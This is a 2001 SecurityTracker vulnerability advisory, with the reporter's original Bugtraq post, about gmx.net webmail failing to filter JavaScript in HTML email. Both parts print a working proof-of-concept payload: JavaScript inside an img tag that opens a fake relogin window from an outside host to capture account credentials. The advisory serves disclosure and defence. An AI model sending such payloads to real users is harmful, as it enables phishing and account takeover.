SecurityTracker: Gmx.net Web-Based E-mail System Lets Remote Users Execute Arbitrary Code on the User's Browser

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (E-mail Server) > Gmx.net

Gmx.net Web-Based E-mail System Lets Remote Users Execute Arbitrary Code on the User's Browser

SecurityTracker Alert ID: 1001730

SecurityTracker URL: http://securitytracker.com/id/1001730

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: Jun 12 2001

Impact: Execution of arbitrary code via network

Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes

Description: A vulnerability has been reported in the gmx.net web-based e-mail system that lets remote users execute arbitrary code on the user's browser.

The system reportedly has a vulnerability that fails to properly filter Javascript in HTML-based e-mail messages.

A remote user can place Javascript within the <img> tag.

An example demonstration trojan is provided:

<html><body> <img src="javascript:
gmx=window.open('http://[host]/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resi
.focus();">
<h4>mungo baby</h4></body></html>

Impact: A remote user can send HTML-based e-mail to a user such that the user's browser will execute trojan Javascript code when the e-mail is viewed (this requires Javascript to be enabled on the user's browser).

Solution: The vendor is preparing a fix, to be released shortly.

Vendor URL: www.gmx.net/ (Links to External Site)

Cause: Input validation error

Underlying OS:

Message History: None.

Source Message Contents

Date: Mon, 11 Jun 2001 09:31:04
Subject: gmx.net



good morning buqtraq,

gmx.net is a european-based free web-mail-, web-community system comparable 
with hotmail.com.

like many other web-mail systems gmx.net has a problem filtering java-script 
in html-based mail-messages.

this enables an attacker to create html-messages with malicious java-script 
embedded.

problem description:

the html - <img> tag can be used to embedd malicious
java-scripts within html-mails

once the "html-mailpart" is opened by the gmx-user it is possible
the "embedded" java-script is executed by the web-browser(if enabled:-) this 
makes it possible to place trojans and execute URL-based webmail-commands 
leading to a compromise of the users webmail-account.

sample with "classic" relogin-trojan:

---cut here---

<html><body> <img src="javascript: 
gmx=window.open('http://216.147.4.38/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resizeTo(1,1);w=screen.availWidth;h=screen.availHeight-40;gmx.moveTo(0,0);gmx.resizeTo(w,h);gmx
.focus();">
<h4>mungo baby</h4></body></html>

---cut here---

.. not very sophisticated but working... changing user-options would be more 
elaborate ..


nice day,


rc

rudicarell@hotmail.com
security@freefly.com
http://www.freefly.com





vendor status: mail has been sent to security@gmx.net


RC-EOF
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
Copyright 2012, SecurityGlobal.net LLC